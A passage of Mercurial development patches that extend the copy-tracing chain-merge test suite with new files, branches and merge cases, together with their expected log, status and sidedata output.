merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mEA-change,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mEA-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mJ,EA-change-m: $case_desc" + created new head + + + $ hg log -G --rev '::(desc("mAE-change,Km") + desc("mK,AE-change-m") + desc("mEA-change,Jm") + desc("mJ,EA-change-m"))' + @ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + |\ + +---o mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | |/ + | | o mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | | |\ + | | +---o mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | | | |/ + | | | o k-1: unrelated changes (based on "e" changes) + | | | | + | o | | j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |/ / / + | o / mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + |/|/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d + | + o i-1: a -move-> c + | + o i-0 initial commit: a b h + + Summary of all created cases ---------------------------- @@ -1055,6 +1138,7 @@ l-1: unrelated changes (based on "c" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAE,Km: chained merges (conflict -> simple) - same content everywhere + mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way @@ -1073,6 +1157,7 @@ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEA,Jm: chained merges (conflict -> simple) - same content everywhere + mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way @@ -1083,7 +1168,9 @@ mGF,Nm: chained merges (copy-overwrite -> simple) - same content mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mJ,EAm: chained merges (conflict -> simple) - same content everywhere + mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mK,AEm: chained merges (conflict -> simple) - same content everywhere mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) @@ -1417,6 +1504,22 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "mAE-change,Km" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mK,AE-change-m" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mEA-change,Jm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mJ,EA-change-m" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -2553,3 +2656,57 @@ a (missing-correct-output upgraded !) h (known-bad-output sidedata !) h (known-bad-output upgraded !) + + +Subcase: chaining conflicting rename resolution, with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f + A f + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + b (known-bad-output sidedata !) + b (known-bad-output upgraded !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f + A f + a (filelog !) + b (missing-correct-output sidedata !) + b (missing-correct-output upgraded !) + a (known-bad-output sidedata !) + a (known-bad-output upgraded !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613750772 -3600 # Fri Feb 19 17:06:12 2021 +0100 # Node ID 46205a478a08ce7adcf622d8bf9c199dff8d1a10 # Parent 664bee002d1a3c11b5042d7bf2c56066c1953d8a test-copies: add 3 new files with their own content The new `p`, `q` and `r` file mirror the `a`, `b` and `h` but with different content for each files. This will be used to create "mirror" test case that involve actual merge happening. For now, we only add the file to keep patches small and easier to review. Differential Revision: https://phab.mercurial-scm.org/D10053 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -75,10 +75,16 @@ $ cp ../same-content.txt a $ cp ../same-content.txt b $ cp ../same-content.txt h + $ echo "original content for P" > p + $ echo "original content for Q" > q + $ echo "original content for R" > r $ hg ci -Am 'i-0 initial commit: a b h' adding a adding b adding h + adding p + adding q + adding r $ hg mv a c $ hg ci -Am 'i-1: a -move-> c' $ hg mv c d @@ -652,7 +658,7 @@ $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)" $ hg up 'desc("i-0")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg mv b d $ hg ci -m "h-1: b -(move)-> d" created new head @@ -1228,6 +1234,9 @@ added : a, ; added : b, ; added : h, ; + added : p, ; + added : q, ; + added : r, ; $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'` @@ -1237,11 +1246,14 @@ > done ##### revision "i-0 initial commit" ##### 1 sidedata entries - entry-0014 size 34 - '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh' + entry-0014 size 64 + '\x00\x00\x00\x06\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00abhpqr' added : a, ; added : b, ; added : h, ; + added : p, ; + added : q, ; + added : r, ; ##### revision "i-1" ##### 1 sidedata entries entry-0014 size 24 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613757429 -3600 # Fri Feb 19 18:57:09 2021 +0100 # Node ID 0ebfd02dafd5f1aef5f1e8a51e44c0ebeff9e86b # Parent 46205a478a08ce7adcf622d8bf9c199dff8d1a10 test-copies: move the new files in the `i` branch The initial branch is moving some of the "same content" file around. We do the same for the "different content" before start to implement more tests. The new files have harmless impact of various existing tests. Differential Revision: https://phab.mercurial-scm.org/D10054 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -86,13 +86,15 @@ adding q adding r $ hg mv a c - $ hg ci -Am 'i-1: a -move-> c' + $ hg mv p s + $ hg ci -Am 'i-1: a -move-> c, p -move-> s' $ hg mv c d - $ hg ci -Am 'i-2: c -move-> d' + $ hg mv s t + $ hg ci -Am 'i-2: c -move-> d, s -move-> t' $ hg log -G - @ i-2: c -move-> d + @ i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -108,9 +110,9 @@ | o a-1: d -move-> e | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -125,9 +127,9 @@ $ hg log -G --rev '::.' @ b-1: b update | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -142,9 +144,9 @@ $ hg log -G --rev '::.' @ c-1 delete d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -164,9 +166,9 @@ | o d-1 delete d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -185,9 +187,9 @@ | o e-1 b -move-> g | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -230,9 +232,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -280,9 +282,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -320,9 +322,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -368,9 +370,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -423,9 +425,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -475,9 +477,9 @@ | | o | d-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -530,9 +532,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -588,9 +590,9 @@ | | o | c-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -637,9 +639,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -664,16 +666,16 @@ created new head $ hg up 'desc("c-1")' - 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved $ hg merge 'desc("h-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way" $ hg up 'desc("h-1")' - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("c-1")' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" created new head @@ -686,9 +688,9 @@ | | o | c-1 delete d | | - o | i-2: c -move-> d + o | i-2: c -move-> d, s -move-> t | | - o | i-1: a -move-> c + o | i-1: a -move-> c, p -move-> s |/ o i-0 initial commit: a b h @@ -740,9 +742,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -847,9 +849,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -930,9 +932,9 @@ | | | o b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1026,9 +1028,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1109,9 +1111,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1137,8 +1139,8 @@ g-1: update d h-1: b -(move)-> d i-0 initial commit: a b h - i-1: a -move-> c - i-2: c -move-> d + i-1: a -move-> c, p -move-> s + i-2: c -move-> d, s -move-> t j-1: unrelated changes (based on the "a" series of changes) k-1: unrelated changes (based on "e" changes) l-1: unrelated changes (based on "c" changes) @@ -1256,16 +1258,20 @@ added : r, ; ##### revision "i-1" ##### 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02acps' removed : a, ; added p1: c, a; + removed : p, ; + added p1: s, p; ##### revision "i-2" ##### 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02cdst' removed : c, ; added p1: d, c; + removed : s, ; + added p1: t, s; ##### revision "a-1" ##### 1 sidedata entries entry-0014 size 24 @@ -1547,7 +1553,10 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' f A f a (no-changeset no-compatibility !) @@ -1569,9 +1578,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1602,12 +1611,18 @@ M b A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBAm")' M b A f a + A t + p R a + R p merging with the side having a delete ------------------------------------- @@ -1630,9 +1645,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1654,10 +1669,16 @@ R d $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-0")' M b + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-0")' M b + A t + p R a + R p - comparing with the merge children re-adding the file @@ -1680,11 +1701,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-1")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-1")' M b A d + A t + p R a + R p Comparing with a merge re-adding the file afterward --------------------------------------------------- @@ -1704,9 +1731,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1760,11 +1787,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBDm-0")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDBm-0")' M b A d + A t + p R a + R p Comparing with a merge with colliding rename @@ -1789,9 +1822,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1881,14 +1914,20 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm-0")' A f a + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm-0")' A f a (filelog !) b (no-filelog !) + A t + p R a R b + R p Subcase: existing copy information overwritten on one branch @@ -1914,9 +1953,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1924,14 +1963,20 @@ M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFBm-0")' M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")' M d (no-changeset !) h (no-filelog no-changeset !) @@ -1966,7 +2011,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -1982,7 +2027,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2008,9 +2053,9 @@ | | o | d-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2023,11 +2068,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDGm-0")' A d a (filelog !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGDm-0")' A d a + A t + p R a + R p $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mDGm-0")' M d $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mGDm-0")' @@ -2045,9 +2096,9 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2060,7 +2111,7 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2074,9 +2125,9 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2089,7 +2140,7 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2116,9 +2167,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2153,14 +2204,20 @@ A d h (no-filelog !) a (filelog !) + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")' A d a (no-changeset !) h (changeset !) + A t + p R a R h + R p $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")' M d $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mGFm-0")' @@ -2192,9 +2249,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2203,7 +2260,7 @@ $ hg log -Gfr 'desc("mFGm-0")' d o g-1: update d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2218,9 +2275,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2229,7 +2286,7 @@ $ hg log -Gfr 'desc("mGFm-0")' d o g-1: update d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2255,9 +2312,9 @@ | | o | c-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2267,11 +2324,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCGm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGCm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCGm-0")' A d $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mGCm-0")' @@ -2300,9 +2363,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2313,12 +2376,18 @@ M b A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-revert-m-0")' M b A d @@ -2346,9 +2415,9 @@ | | o | c-1 delete d | | - o | i-2: c -move-> d + o | i-2: c -move-> d, s -move-> t | | - o | i-1: a -move-> c + o | i-1: a -move-> c, p -move-> s |/ o i-0 initial commit: a b h @@ -2356,13 +2425,19 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' A d b (no-compatibility no-changeset !) + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mHC-delete-before-conflict-m")' A d b + A t + p R a R b + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCH-delete-before-conflict-m")' A d b @@ -2372,9 +2447,15 @@ b R b $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mCH-delete-before-conflict-m")' + A t + p R a + R p $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")' + A t + p R a + R p Variant of previous with extra changes introduced by the merge -------------------------------------------------------------- @@ -2401,9 +2482,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2493,14 +2574,20 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")' A f a + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")' A f a (filelog !) b (no-filelog !) + A t + p R a R b + R p Decision from previous merge are properly chained with later merge @@ -2575,14 +2662,20 @@ a (filelog !) a (sidedata !) a (upgraded !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d a (filelog !) a (sidedata !) a (upgraded !) + A t + p R a + R p chained output @@ -2592,32 +2685,44 @@ a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) + A t + p A unrelated-l R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' M b A d a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) + A t + p A unrelated-l R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' M b A d a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) + A t + p A unrelated-l R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' M b A d a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) + A t + p A unrelated-l R a + R p Subcase: chaining "merged" information during a merge `````````````````````````````````````````````````````` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613764027 -3600 # Fri Feb 19 20:47:07 2021 +0100 # Node ID 067307d6589da42be47d8de787ba1d5840b10ef3 # Parent 0ebfd02dafd5f1aef5f1e8a51e44c0ebeff9e86b test-copies: add a `p` branch similar to the `a` but on the new files This branch will be used to create merge case that mirror ones involving the `a` branch. Differential Revision: https://phab.mercurial-scm.org/D10055 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -193,6 +193,29 @@ | o i-0 initial commit: a b h + $ hg up -q null + +Having a branch similar to the 'a' one, but moving the 'p' file around. + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv t u + $ hg ci -Am 'p-1: t -move-> u' + created new head + $ hg mv u v + $ hg ci -Am 'p-2: u -move-> v' + $ hg log -G --rev '::.' + @ p-2: u -move-> v + | + o p-1: t -move-> u + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + $ hg up -q null Setup all merge =============== @@ -209,7 +232,7 @@ $ case_desc="simple merge - A side: multiple renames, B side: unrelated update" $ hg up 'desc("b-1")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("a-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) @@ -1186,6 +1209,8 @@ mO,FGm: chained merges (copy-overwrite -> simple) - same content n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) + p-1: t -move-> u + p-2: u -move-> v Test that sidedata computations during upgrades are correct @@ -1316,6 +1341,18 @@ '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg' added p1: f, g; removed : g, ; + ##### revision "p-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00tu' + removed : t, ; + added p1: u, t; + ##### revision "p-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv' + removed : u, ; + added p1: v, u; ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613764035 -3600 # Fri Feb 19 20:47:15 2021 +0100 # Node ID eb60dadd1be1ab94e3a7e652ecd9e3835e054155 # Parent 067307d6589da42be47d8de787ba1d5840b10ef3 test-copies: add a `q` branch similar to the `e` but on the new files This branch will be used to create merge case that mirror ones involving the `e` branch. Differential Revision: https://phab.mercurial-scm.org/D10056 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -217,6 +217,28 @@ $ hg up -q null +Having another branch renaming a different file to the same filename as another + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r w + $ hg ci -m 'q-1 r -move-> w' + created new head + $ hg mv w v + $ hg ci -m 'q-2 w -move-> v' + $ hg log -G --rev '::.' + @ q-2 w -move-> v + | + o q-1 r -move-> w + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + $ hg up -q null + Setup all merge =============== @@ -1211,6 +1233,8 @@ o-1: unrelated changes (based on "g" changes) p-1: t -move-> u p-2: u -move-> v + q-1 r -move-> w + q-2 w -move-> v Test that sidedata computations during upgrades are correct @@ -1353,6 +1377,18 @@ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv' removed : u, ; added p1: v, u; + ##### revision "q-1 r -move-> w" ##### + 1 sidedata entries + entry-0014 size 24 + 